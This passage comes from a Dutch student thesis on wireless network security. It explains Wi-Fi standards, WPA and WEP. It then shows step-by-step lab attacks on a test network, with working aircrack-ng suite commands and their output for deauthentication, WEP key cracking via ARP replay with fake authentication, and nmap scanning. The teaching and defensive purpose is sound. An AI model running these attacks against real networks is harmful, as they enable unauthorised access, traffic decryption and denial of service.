op welke frequentie het Wi-Fi netwerk zal werken. Het hangt van de frequentie af welke channels

mogelijk zijn en welke snelheid er mogelijk is binnen het draadloos netwerk.

Hieronder bevindt zich een tabel met de mogelijke Wi-Fi versies met hun frequentie en mogelijke

bandbreedte. Er zijn veel factoren die de bandbreedte kunnen beïnvloeden. Hoe hoger de

frequentie, hoe minder ver het draadloos netwerk zal reiken en hoe hoger de bandbreedte is.

Wi-Fi versie Jaar van productie Frequentie Bandbreedte

802.11 1997 2.4 GHz 2 Mbps

802.11b 1999 2.4 GHz 11 Mbps

802.11a 1999 5 GHz 54 Mbps

802.11g 2003 2.4 GHz 54 Mbps

802.11n 2007 2.4 GHz, 5 GHz 100 Mbps

802.11ac 2014 5 GHz 500 Mbps Tabel 3-1 Wi-Fi versie en Frequentie

Page 86: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

86

Bij een draadloos netwerk is het mogelijk dat verschillende channels overlappen waardoor deze

elkaar verstoren. Hierdoor kan het dat je Wi-Fi soms wegvalt of dat je bandbreedte heel hard

afneemt. Dit is een probleem bij appartementsgebouwen waar veel draadloze netwerken aanwezig

zijn. Hieronder bevindt zich een overzicht van de verschillende mogelijke channels bij een 2.4 GHz

draadloos netwerk.

Tabel 3-2 Channels met overlapping

In een 5 GHz netwerk bestaat er geen overlapping. De channels die hier kunnen gebruikt worden zijn

van channel 36 tot channel 140. In een 5Ghz netwerk is er geen overlapping mogelijk.

Bron: https://discussions.apple.com/thread/2632171,

http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm

4 Verschillende types Wi-Fi Er zijn verschillende manieren om een draadloos netwerk te maken, ad-hoc en infrastructure.

4.1 Ad-hoc Bij een ad-hoc netwerk zal er gebruik gemaakt worden van een peer-to-peer manier, dus zonder

gebruik te maken van een acces point.

4.2 Infrastructure Infrastructure netwerken hebben een acces point nodig om connectie mee te maken, de acces point

is dan aangesloten aan het bedraad netwerk. Deze soort draadloze netwerken zijn de meest

voorkomende, we zullen deze netwerken dus uitgebreid bespreken.

Als je wil connectie maken met een draadloos netwerk, moet je de Service Set Identifier (SSID) te

weten komen. Dit kan je via twee manieren doen:

Je kan luisteren naar beacons, in die beacons is de SSID in vermeld. Deze beacons worden

uitgestuurd door de access point.

Je kan ook een probe request sturen zonder specifieke SSID waardoor al de SSID’s zullen

reageren met een probe response.

Page 87: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

87

Als je de SSID weet zal je een probe request uitsturen (dit is een broadcast), hij zal dit op elke

channel apart doen. Dit zal hij doen totdat hij het draadloos netwerk gevonden heeft dat hij op

voorhand geconfigureerd heeft. Dit komt hij te weten als hij een probe response terugkrijgt van

de acces point. Hierna zal de client aan authentication request sturen en, als hij een

authentication response terugkrijgt van de acces point is, hij verbonden met het netwerk.

We zijn ervan uitgegaan dat er geen vorm van beveiliging aanwezig is in het netwerk.

5 Manieren om een draadloos netwerk te beveiligen Er zijn verschillende manieren om een draadloos netwerk te beveiligen. Dit gaat vanaf enkel

vertrouwde toestellen binnen te laten in het netwerk, tot de encryptie die op het netwerk

plaatsvindt.

5.1 Basis methodes De volgende methodes zijn basis methodes om een draadloos netwerk te beveiligen. De volgende

methodes zijn gemakkelijk te omzeilen maar zullen leken weerhouden om connectie te maken met je

draadloos netwerk.

5.1.1 MAC filtering Een access point heeft de mogelijkheid om aan MAC filtering te doen. Dit wil zeggen dat de access

point tijdens de authenticatie fase zal kijken naar het MAC-adres en als deze niet in een voor

geconfigureerde lijst voorkomt, dan zal hij geen toegang krijgen tot het draadloos netwerk.

5.1.2 Verborgen draadloze netwerken Het is mogelijk om je access point zo te configureren dat als hij een beacon uitzendt hier de SSID niet

in zit. Dit maakt het moeilijker voor een aanvaller om te verbinding te maken met het netwerk,

omdat hij de SSID nodig heeft om verbinding te maken met het netwerk.

5.1.3 Antwoorden op probe requests Clients kunnen probe requests uitsturen zonder een SSID, waardoor ze van elk draadloos netwerk

dat zich in de buurt bevindt antwoord krijgt. Om ervoor te zorgen dat je draadloos netwerk hier niet

bijzit kan je je acces point zo configureren dat hij al de probe requests zonder SSID zal negeren. In

een bedrijfsomgeving is het aangeraden al de toestellen zo te configureren dat ze de SSID al weten.

Als je gasten krijgt kan je hier de SSID aan vertellen. Hiermee zorg je ervoor dat mensen waarvan je

niet wil dat ze de SSID te weten komen er moeilijker aan geraken.

Page 88: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

88

5.2 Authenticatie Er is een groot verschil tussen authenticatie en encryptie. Bij authenticatie zal je toegang krijgen tot

het netwerk, er zal dan ook een sessie key aangemaakt worden, die gebruikt zal worden bij het

encryptie proces. De encryptie en authenticatie zullen beide gebeuren nog voordat het toestel dat

verbinding wil maken met het netwerk een IP-adres krijgt. Voor de authenticatie wordt er Wi-Fi

Protected Access (WPA) gebruikt. Er zijn twee soorten WPA: WPA Pre-Shared Key en WPA Enterprise.

WPA Pre-Shared Key (WPA-PSK): een key zal gebruikt worden bij de connectie met het

draadloos netwerk. Deze key is gekend bij de access point en bij al de clients in het draadloos

netwerk. Het is dezelfde key die zal gebruikt worden bij al de clients. Deze WPA key wordt in

een cryptografische functie gebruikt om encryptie keys te maken. Hiermee zal de sessie

beveiligd worden.

WPA Enterprise: de access point zal de authenticatie laten gebeuren door een RADIUS

server. Hierdoor kunnen vele soorten authenticatie gebruikt worden, waardoor je de manier

van authenticatie kan aanpassen aan de situatie. Je kan het extensible authentication

protocol (EAP) gebruiken die vele authenticatie mechanismen ondersteunt zoals EAP-TTLE,

PEAP en EAP-FAST.

Bij beide WPA-PSK en WPA Enterprise zal er een “four-way” handshake plaatsvinden om twee

encryptie keys aan te maken:

een pairwise transient key (PTK) die zal gebruikt worden voor de unicast communicatie

een group temporal key (GTK) die zal gebruikt worden voor mulitcast en broadcast

communicatie

5.2.1 WPA four-way handshake Bij WPA zal er een four-way handshake plaatsvinden omdat de Pairwise Master Key (PMK) het best

niet al te veel bekendgemaakt wordt. Er zullen dus andere keys gemaakt worden, een pairwise

transient key (PTK) die zal gebruikt worden voor de unicast communicatie en een group temporal key

(GTK) die zal gebruikt worden voor mulitcast en broadcast communicatie.

De afbeelding hieronder geeft meer informatie over hoe deze four-way handshake tot stand komt.

De STA is de client station.

Tabel 5-1 Four-way-handshake

Page 89: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

89

De verschillende stappen zijn:

De access point (AP) zendt een nonce naar de STA (ANonce). De client heeft nu al de

gegevens om een PTK aan te maken. Dit zal hij doen door de gegevens die hij gekregen heeft,

te combineren met de PMK die hij bekomen heeft bij de authenticatie.

De STA zal dan zijn eigen nonce (SNonce) doorsturen met een MIC naar de AP. Een MIC is

een Message Authentication and Integrity Code. Deze zal dus de authenticatie en de

integriteit nakijken.

De Accespoint zal dan op zijn beurt de PTK maken.

De Accespoint zal dan de GTK naar de STA sturen met daarbij een sequentienummer en een

MIC. Dit sequentienummer zal de AP gebruiken bij het volgende multicast of

broadcastpakket om zo basis replay detectie te doen.

De STA zal dan als laatste een confirmatie sturen naar de AP.

bron: http://en.wikipedia.org/wiki/IEEE_802.11i-2004

5.3 Encryptie Encryptie zal gebeuren op laag 2 van het OSI model waardoor de IP-adressen, MAC-adressen, probes

en beacons niet geëncrypteerd worden. De data die via het draadloos netwerk naar een bedraad

netwerk gaan, zal gedecrypteerd worden als het naar het bedraad netwerk gaat. Dit decrypteren

heeft geen effect op het gebruik van een encryptie op een hogere laag van het OSI model, zoals

HTTPS.

Er zijn drie mogelijkheden om draadloos verkeer te encrypteren:

Wired Equivalent Privacy (WEP): WEP is de voorloper van WPA met één groot verschil, dat

WEP geen authenticatie fase heeft. Bij WEP weet elke deelnemer in het netwerk de

encryptiesleutel waardoor het niet veilig is. Er zijn ook manieren om een WEP key te kraken

waardoor het niet veilig is en waardoor je het beter niet meer gebruikt.

Temporal Key Integrity Protocol (TKIP): TKIP is een protocol dat ingevoerd is om WEP te

vervangen, er is geen andere hardware voor nodig. Alles wat WEP ondersteunt, ondersteunt

ook TKIP. Bij TKIP zal er een andere encryptie key gebruikt bij elke andere deelnemer in het

netwerk. Er zal ook een integriteitcontrole gedaan worden, dit wil zeggen dat pakketten

waarvan de sequentienummer niet op elkaar opvolgen niet zal toegelaten worden. Er zal bij

TKIP ook een hash uitgevoerd worden per pakket. Meer informatie over hashing is te vinden

in “Stap 5: Remote connectivity”.

Advanced Encryption Standard – Counter Mode with Cipher Block Chaning Message

Authentication Code Protocol (AES-CCMP): AES-CCMP is een totaal andere en veel betere

manier voor encryptie. Hier zal rekenig gehouden worden met data-integriteit en

confidentialiteit.

Page 90: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

90

6 Discovery en monitoren Om netwerk discovery te doen bestaan er tools die probe requests en probe responses zullen

nakijken, om zo draadloze netwerken te vinden. Aangezien de IP-adressen niet geëncrypteerd zijn,

kan dit soort tool ook nagaan van waar naar waar op het netwerk veel verkeer is. Er zijn twee

soorten van discovery:

active discovery

passive discovery

6.1 Active Discovery Bij active discovery zullen er probe request uitgestuurd worden zonder SSID en gewacht worden

totdat er acces points iets terugsturen. Dit zal soms niet werken, omdat de access points zo ingesteld

kunnen worden dat ze dit soort requests negeren.

6.2 Active Discovery Tegenmaatregels Omdat het bij active discovery nodig is om met probe requests te werken, kan je dit soort van

broadcast uitzetten aan de access point.

6.3 Passive Discovery Passive discovery is de soort van discovery die het meeste gebruikt wordt. Dit soort van discovery zal

elk kanaal afgaan en luisteren naar de data die voorbijkomen om er zo achter het BSSID’s (mac adres

van acces point) te komen. De tool zal dan de SSID identificeren als ongekend. Als er een client

verbinding maakt met het netwerk moet deze de SSID meesturen. Dus als dit gebeurt zal je de SSID

te weten komen. Passive discovery kan je niet nagaan, dus dit is de beste manier voor de aanvaller

die niet gekend wilt zijn.

6.4 Passive Discovery Tegenmaatregels Er is niet echt iets wat je kan doen tegen passive discovery. Wat je kan doen is nagaan dat je

draadloos signaal niet buiten de fysieke afbakening van je bedrijf komt. Je kan dit doen door de

sterkte van het signaal dat uit de access point komt te verminderen.

6.5 Discovery tools Er zijn zeer veel discovery tools, maar er zijn twee linux tools die zeer goed zijn:

Kismet

airodumt-ng

Er zijn veel mensen die deze tools gebruiken om zo al de acces points in kaart te brengen, dit gebeurt

op vele verschillende manieren, te voet, via boot, te fiets, te auto en zelf via drones met een

ingebouwde Wi-Fi antenne en GPS antenne. De gegevens zijn terug te vinden op www.wigle.net.

Page 91: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

91

6.5.1 Kismet Kismet is een robuuste tool die alsmaar beter wordt met de tijd. Deze tool heeft een ingebouwde

GPS functie en laat zelf interactie toe met de muis, wat niet vaak gebeurt bij Linux tools. Kismet kan

je downloaden via www.kismetwireless.net.

Commando:

kismet

Resultaat:

6.5.2 Airodump-ng Airodump-ng is een tool die te vinden is bij de veelgebruikte wireless hacking toolset aircrack-ng die

te vinden is via www.aircrack-ng.org. Deze suite bevat zo goed als elke draadloze hacking tool en

deze suite wordt goed onderhouden. Bij deze tool moet je eerst je draadloze adapter in monitor

mode brengen.

Commando:

airmon-ng start wlan0

Resultaat:

Interface Chipset Driver

wlan0 Intel 1030 iwlwifi - [phy0]

(monitor mode enabled on mon0)

Nu de monitor mode gestart is kan men airodump-ng starten. Met de monitor mode aan te zetten is

er een nieuwe interface gemaakt, deze interface is (mon0). Nu kunnen we airodump-ng starten.

Page 92: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

92

Airodump-ng zal luisteren naar al de mogelijke draadloze acces points, door te hoppen tussen de

mogelijke 2.4 GHz channels en al de data hierop te observeren.

Commando:

airodump-ng mon0

Resultaat:

CH 5 ][ BAT: 2 hours 50 mins ][ Elapsed: 16 s ][ 2014-01-14 11:07

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

42:D9:98:60:C3:BC -70 43 0 0 6 54e. WEP WEP testnetwerk

BSSID STATION PWR Rate Lost Frames Probe

7 Denial of service attack Bij de 802.11 standaard is er eigenlijk al een ingebouwde DOS aanval. In sommige gevallen is het

nodig om de client te de-authentiseren, in het geval van foute encryptie keys, overloading, enz…

7.1 De-authenticatie aanval Bij een de-authenticatie aanval zullen er de-authenticatie frames nagemaakt worden en verstuurd

worden naar de clients alsof ze van de AP komen. En omgekeerd, zodat de AP denkt dat de client de

verbinding wil verbreken en dat de client hetzelfde denkt van de AP.

7.1.1 airplay-ng Airplay-ng is een tool die veel functionaliteiten heeft, waaronder de mogelijkheid bestaat om een de-

authenticatie aanval uit te voeren. Deze tool zal bij elke aanval 64 de-authenticatie frames uitsturen

naar de AP en 64 de-authenticatie frames naar de client.

Eerst zal je de adapter op monitor mode moeten zetten en de channel kiezen.

Commando: iwconfig mon0 channel 1

Na het vorige commando kan je de aanval starten.

Commando: aireplay-ng --deauth 2 -a 42:D9:98:60:C3:BC -c CC:08:E0:20:F8:74 mon0

Resultaat:

22:09:26 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6

22:09:27 Sending 64 directed DeAuth. STMAC: [CC:08:E0:20:F8:74] [40|65

ACKs]

22:09:27 Sending 64 directed DeAuth. STMAC: [CC:08:E0:20:F8:74] [18|63

ACKs]

Page 93: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

93

8 Encryptie aanval Een encryptie aanval komt tot stand wanneer er een kwetsbaarheid ontdekt wordt in de methode

die gebruikt wordt om te authentiseren. Bij WPA is de authenticatiemethode Tkip of AES-CCMP, dus

als er bij één van deze protocollen een kwetsbaarheid ontdekt wordt dan kan je deze gebruiken om

de key te kraken. WPA is een encryptiemethode waarbij de encryptiesleutels roteren in het netwerk,

waardoor het moeilijker wordt om de key te kraken. Bij WEP is het simpel om een encryptieaanval te

doen, omdat hier geen authenticatie-fase of key-rotatie plaatsvindt. Dus als je in een WEP-netwerk

de key gekraakt hebt, dan kan je als een betrouwde gebruiker het netwerk betreden en andere

mensen hun pakketten decrypteren zonder dat iemand dit zal te weten komen.

8.1 WEP Er zijn vele manieren ontdekt om een WEP encryptie methode te kraken. De twee meest gebruikte

zullen besproken worden:

Passieve aanval

ARP replay aanval

8.1.1 Achtergrond bij WEP encryptie Als je data over een draadloos netwerk stuurt dat beveiligd is door WEP, dan zal er een soort van

encryptie plaatsvinden. Deze encryptie wordt gedaan door gebruik te maken van de WEP key en een

Initialization Vector (IV). Deze IV is 24 bits groot, wordt random gegenereerd en wordt bijgevoegd

aan het einde van een 802.11 header. De IV en de WEP key worden gebruikt om een keystream te

maken. Deze keystream zal dan gebruikt worden om de pakketten te encrypteren.

Om de pakketten de decrypteren, zal de ontvangende kant de IV uit het pakket halen. Met die IV en

WEP-key zal dan weer een keystream aangemaakt worden. Met deze keystream kunnen de

pakketten gedecrypteerd worden.

De IV heeft maar een grootte van 24bits waardoor er dubbele IV’s op het netwerk kunnen zijn. Als er

een dubbele IV gevonden wordt op het netwerk, dan wordt de geencrypteerde tekt van de twee

frames vergeleken met elkaar om zo de keystream te ontdekken.

De keystream kan ook geraden worden door een groot aantal frames van een bepaald type te

verzamelen. Omdat ARP pakketten niet zo verschillend zijn van elkaar en omdat ze klein zijn, zijn dit

de pakketten die het meeste gebruikt zullen worden. Hoe meer frames je bijhoudt, hoe meer kans je

hebt om de keystream te ontdekken.

Aan de hand van de keystream en de gecollecteerde IV’s, kan de WEP key geraden worden.

8.1.2 Passieve aanval Bij een passieve aanval zal je je 802.11 capturing tool gebruiken om zoveel mogelijk data frames te

collecteren. Vroeger zou je ongeveer 1 miljoen frames nodig gehad hebben om een 104-bit WEP-key

te kraken. Met de tools van tegenwoordig is dit nog maar om en bij de 60 000. De tool die we

hiervoor zullen gebruiken is aurodump-ng. Om daarna de keystream en WEP-key te vinden, maken

we gebruik van aircrack-ng.

Page 94: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

94

8.1.2.1 Airodump-ng

Commando om WEP-frames bij te houden:

airodump-ng –channel 1 –write wepdata mon0

Uitleg bij commando:

Je moet de channel waarop je netwerk zich bevindt meegeven. Om achteraf de data te laten

analyseren laat je al je frames in een bestand steken dat begint met wepdata. Je geeft de monitor

interface 0 mee. Deze monitor interface moet je zelf aanmaken. Dit kan je doen door het volgende

commando in te geven: airmon-ng start wlan0.

8.1.2.2 Aircrack-ng

Commando om WEP-frames te analyseren: aircrack-ng wepdata01.cap

Nadat je al de frames verzameld hebt, kan je je PCAP bestand door aircrack-ng laten analyseren.

Omdat het hier gaat om een testnetwerk en omdat er momenteel geen data over dit netwerk

gestuurd worden, is het niet mogelijk om de WEP-key en keystream te kraken.

Resultaat:

Opening wepdata2-01.cap

Read 171487 packets.

# BSSID ESSID Encryption

1 42:D9:98:60:C3:BC testnetwerk WEP (40226 IVs)

Choosing first network as target.

Opening wepdata2-01.cap

Attack will be restarted every 5000 captured ivs.

Starting PTW attack with 40375 ivs.

KEY FOUND! [ AF:AF:AF:AF:AF ]

Decrypted correctly: 100%

8.2 ARP Replay with Fake authenticaton Bij er ARP replay aanval zullen er data gegenereerd worden op het draadloos netwerk. Deze data

zullen dan kunnen geanalyseerd worden. In minder dan vijf minuten kan je op deze manier een WEP-

key vinden.

Omdat er bij WEP geen replay detectie is, kan elke frame die ontvangen wordt terug op het netwerk

gestuurd worden. Deze teruggestuurde frames zullen weer behandeld worden als nieuwe frames.

Een ARP replay aanval zal het verkeer op het netwerk analyseren en zoeken naar broadcast ARP

frames. Van deze frames zullen de geadresseerden veranderd worden en dan teruggestuurd worden

naar de AP. De AP zal deze frame dan decrypteren, weer encrypteren met een IV en deze frame dan

weer uitsturen. Door dit vele malen opnieuw te doen, zal er veel verkeer gegenereerd worden.

De ARP-requests die je stuurt naar de AP moeten komen van een geauthentiseerde client, anders

aanvaardt hij de frames niet. Je zal dus eerst een connectie maken met de AP waardoor de AP denkt

dat je een betrouwde client bent. Dit kan je doen met airplay-ng.

Page 95: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

95

8.2.1 Aanval met de aircrack-ng suite De aircrack-ng suite zal gebruikt worden om deze aanval uit te voeren en hierdoor dan de key te

vinden.

8.2.1.1 Monitor mode

Voor we beginnen moeten we de adapter in monitor mode plaatsen.

Commando:

airmon-ng start wlan0

Resultaat:

Interface Chipset Driver

wlan0 Intel 1030 iwlwifi - [phy0]

(monitor mode enabled on mon0)

8.2.1.2 De capture starten

Nadat we de adapter in monitor mode plaatsen zullen we de capture starten. Deze laten we

doorheen de volgende stappen lopen, zodat we op het einde genoeg data verzameld hebben om te

kunnen analyseren met aircrack-ng.

Commando:

airodump-ng --channel 6 --bssid 42:D9:98:60:C3:BC --write wepdata2 mon0

Resultaat:

CH 6 ][ BAT: 2 hours 35 mins ][ Elapsed: 6 mins ][ 2014-01-14 11:22

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

42:D9:98:60:C3:BC -65 100 3705 63920 2 6 54e. WEP WEP OPN testnetwerk

BSSID STATION PWR Rate Lost Frames Probe

42:D9:98:60:C3:BC CC:08:E0:20:F8:74 -37 1 -54 2 141614

8.2.1.3 Fake authenticatie

Nu onze capture bezig is, openen we een nieuw venster waarin we een fake authenticatie aanval

zullen starten. We zullen dit doen door airplay-ng te gebruiken.

Commando:

aireplay-ng --fakeauth 1000 -q 10 -a 42:D9:98:60:C3:BC -h CC:08:E0:20:F8:74

mon0

Resultaat:

The interface MAC (4C:EB:42:94:81:C1) doesn't match the specified MAC (-h).

ifconfig mon0 hw ether CC:08:E0:20:F8:74

11:17:44 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6

11:17:44 Sending Authentication Request (Open System) [ACK]

11:17:44 Authentication successful

11:17:44 Sending Association Request [ACK]

11:17:44 Association successful :-) (AID: 1)

11:17:54 Sending keep-alive packet [ACK]

11:18:04 Sending keep-alive packet [ACK]

Page 96: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

96

8.2.1.4 ARP replay aanval

Nadien doen we een ARP-replay aanval om zo verkeer op het netwerk te genereren.

Commando:

aireplay-ng --arpreplay -b 42:D9:98:60:C3:BC -h CC:08:E0:20:F8:74 mon0

Resultaat:

The interface MAC (4C:EB:42:94:81:C1) doesn't match the specified MAC (-h).

ifconfig mon0 hw ether CC:08:E0:20:F8:74

11:23:44 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6

Saving ARP requests in replay_arp-0114-112344.cap

You should also start airodump-ng to capture replies.

Read 375 packets (got 124 ARP requests and 70 ACKs),

sent 104 packets...(501 ppsRead 513 packets (got 194 ARP requests and 106

ACKs),

sent 153 packets...(497 ppRead 640 packets (got 261 ARP requests and 142

ACKs),

sent 204 packets...(500 ppRead 802 packets (got 365 ARP requests and 195

ACKs),

sent 254 packets...(500 ppRead 968 packets (got 466 ARP requests and 248

ACKs),

sent 304 packets...(500 ppRead 1128 packets (got 565 ARP requests and 300

ACKs),

sent 354 packets...(500 pRead 1290 packets (got 667 ARP requests and 354

ACKs)

8.2.1.5 Aircrack-ng

Tijdens de ARP replay aanval, kunnen we het wepdata.cap bestand laten analyseren door aircrack-ng

om achter de WEP-key te komen. Moest dit nog niet lukken, wacht je beter nog even en dan laat je

aircrack-ng terug hetzelfde bestand analyseren.

Commando:

aircrack-ng wepdata2-01.cap

Resultaat:

Opening wepdata2-01.cap

Read 171487 packets.

# BSSID ESSID Encryption

1 42:D9:98:60:C3:BC testnetwerk WEP (40226 IVs)

Choosing first network as target.

Opening wepdata2-01.cap

Attack will be restarted every 5000 captured ivs.

Starting PTW attack with 40375 ivs.

KEY FOUND! [ AF:AF:AF:AF:AF ]

Decrypted correctly: 100%

8.2.2 WEP Hacking Tegenmaatregels Zoals hierboven aangetoond is, heeft WEP zeer veel kwetsbaarheden. Het is dus een

encryptie methode die je het best niet gebruikt op je draadloos netwerk. Als je toch WEP gebruikt,

dan kan je evengoed geen encryptie toepassen op je netwerk.

Page 97: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

97

Case 1: Scannen en IPS instellen 1 Inleiding Scannen is een belangrijk onderdeel voor een hacker. De hacker zal hiermee kunnen identificeren

welke en hoeveel toestellen aanwezig zijn op het netwerk. Hij zal ook te weten komen welke services

aanwezig zijn op welke hosts.

2 Topologie Diagram

3 IP-adressen tabel In de volgende tabel vindt u een overzicht van hoe de toestellen verbonden zijn met elkaar en welke

IP-adressen ze gekregen hebben.

4 Objectieven Testnetwerk maken

Netwerk scannen

Intrusion Prevention System instellen

Intrusion Prevention System uittesten

Toestel Interface IP-adres Subnet Mask Default Gateway

Switchport

Internet Serial 0/0/0 10.1.1.2 255.255.255.252 / /

Serial 0/0/1 10.2.2.2 255.255.255.252 / /

InternNetwerk Serial 0/0/0 10.1.1.1 255.255.255.252 / /

Gigabyte 0/1 192.168.1.1 255.255.255.0 / Switch Intern fa0/1

ExternNetwerk Serial 0/0/1 10.2.2.1 255.255.255.252 / /

Gigabyte 0/1 192.168.3.1 255.255.255.0 / Switch Extern fa0/1

NetwerkAdmin NIC 192.168.1.3 255.255.255.0 192.168.1.1 Switch Intern fa0/3

Scanner NIC 192.168.3.3 255.255.255.0 192.168.3.1 Switch Extern fa0/3

Page 98: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

98

5 Stappenplan In dit stappenplan zal besproken worden hoe je een netwerk kan opstellen waarin je duidelijk kan

zien wat de voordelen zijn van een Intrusion Prevention System. Er zal ook besproken worden hoe en

waarom je bepaalde scans uitvoert op het netwerk.

5.1 Stap 1: Testnetwerk opstellen en uittesten In deze stap zal besproken worden hoe je het testnetwerk kan opstellen en daarna kan uittesten. We

hebben gewerkt met statische adressering en met OSPF. OSPF zorgt ervoor dat er connectie mogelijk

is tussen de verschillende netwerken.

Om het testnetwerk uit te stellen zal er vanaf de router van het extern netwerk een ICMP bericht

gestuurd worden naar de router van het interne netwerk, als dit succesvol is, is de configuratie van

het testnetwerk geslaagd.

5.1.1 IP-adressen instellen Om de IP-adressen in te stellen op de routers kan je de volgende commando’s gebruiken:

enable

conf t

hostname R1

interface serial 0/0/0

ip address 10.1.1.1 255.255.255.252

clock rate 64000

no shut

interface gig 0/1

ip address 192.168.1.1 255.255.255.0

no shut

end

copy run start

Deze commando’s kan je gebruiken om zo bij elke router de IP-adressen toe te toe te wijzen. Je moet

wel de IP-adressen en interfaces veranderen per router.

5.1.2 OSPF instellen Om ervoor te zorgen dat er connectiviteit tussen de afzonderlijke netwerken mogelijk is stellen we

OSPF in:

en

conf t

router ospf 1

network 10.1.1.0 0.0.0.3 area 0

network 192.168.1.0 0.0.0.255 area 0

end

copy run start

Je zal dit net zoals bij de IP-adressen moeten herhalen bij elke router. Maar dan wel met de andere

netwerken.

Page 99: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

99

5.1.3 Testnetwerk uittesten Om het testnetwerk uit te testen hebben we ICMP Echo Requests (ping) verstuurd van de router in

het externe netwerk naar de router van het interne netwerk. Als er van de router van het interne

netwerk ICMP Echo Reply’s terugkomen dan is er connectiviteit.

Commando:

ping 10.1.1.1

Resultaat:

5.2 Stap 2: Netwerk scannen Als hacker zal je proberen om het netwerk te scannen om zo veel gegevens te kunnen vergaren over

het netwerk. Enkele verschillende scans die je kan uitvoeren zijn:

een ARP-scan

een ping-sweep

een TCP poortscan

een Intense scan

5.2.1 ARP-scan Een ARP-scan zal gebruik maken van het ARP-protocol. Bij een ARP-scan zullen er ARP-requests

gestuurd worden voor elke host in het netwerk. Al de hosts die aanwezig zijn zullen antwoorden met

een ARP-reply. Deze ARP-reply bevat hun MAC-adres.

Commando:

arp-scan 192.168.1.1

Resultaat:

Initiating ARP Ping Scan at 16:10

Scanning 192.168.1.1 [1 port]

MAC Address: 44:03:A7:5B:10:81 (Cisco)

Completed ARP Ping Scan at 16:10, 0.58s elapsed (1 total hosts)

Page 100: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

100

5.2.2 Ping-sweep Met een ping-sweep zal je naar elke host in het netwerk een ping sturen. Dit is een ICMP Echo

request. Als je een ICMP Echo reply terugkrijgt dan weet je dat dat toestel aanwezig is op het

netwerk.

Commando:

ping 192.168.1.1

Resultaat:

5.2.3 TCP poortscan Met een TCP poortscan zal je een connectie proberen te op te stellen met verschillende poorten op

al de toestellen in een netwerk. De poorten die de connectie aanvaarden, dus diegene dat in

“listening” state zijn zullen de connectie aanvaarden. Hiermee kan besluiten dat die poorten open

staan. Achter elke open poort bevindt zich een service aan het luisteren is.

De poortscan zal uitgevoerd worden met de tool Nmap.

Commando SYN stealth scan:

nmap –sS 192.168.1.1

Resultaat:

Initiating SYN Stealth Scan at 16:10

Scanning 192.168.1.1 [1000 ports]

Not shown: 995 closed ports

PORT STATE SERVICE

23/tcp open telnet

2002/tcp open telnet

4002/tcp open tcpwrapped

6002/tcp open tcpwrapped

9002/tcp open tcpwrapped

MAC Address: 44:03:A7:5B:10:81 (Cisco)Completed SYN Stealth Scan at 16:10,

0.86s elapsed (1000 total ports)

Page 101: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

101

5.2.4 Intense scan Om echt alles te weten te komen over een bepaalde host kan je een intense scan uitvoeren. Deze

scan heeft zeer veel kans om gelogd te worden door het systeem. Om de reden dat er bij deze scan

zeer veel verschillende methodes uitgevoerd worden om te scannen.

Commando:

nmap -T4 -A -v 192.168.1.1

Resultaat:

Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-18 16:10 Romance

(standaardtijd)

NSE: Loaded 110 scripts for scanning.

NSE: Script Pre-scanning.

Initiating ARP Ping Scan at 16:10

Scanning 192.168.1.1 [1 port]

Completed ARP Ping Scan at 16:10, 0.58s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 16:10

Completed Parallel DNS resolution of 1 host. at 16:10, 16.52s elapsed

Initiating SYN Stealth Scan at 16:10

Scanning 192.168.1.1 [1000 ports]

Discovered open port 23/tcp on 192.168.1.1

Discovered open port 4002/tcp on 192.168.1.1

